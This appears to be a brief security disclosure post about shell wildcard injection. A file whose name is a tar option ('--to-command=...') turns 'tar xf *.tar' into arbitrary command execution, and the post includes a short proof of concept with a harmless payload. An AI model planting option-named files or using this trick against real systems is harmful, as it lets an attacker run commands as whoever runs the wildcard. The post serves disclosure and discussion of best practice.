Shell wildcards considered dangerous?
Shell wildcards considered dangerous?
Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377
Summary: For trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for
PROGRAM=EXT=tar
The main idea is the wildcard to add program options.
Open problem:
Are popular programs other than tar vulnerable?
Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?
Example exploit vector: starting program in untrusted
directories.
Poc:
====
$rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : > --to-command="yes .tar"
#end creating, starts PoC
tar xf *.tar
#.tar (repeats)
====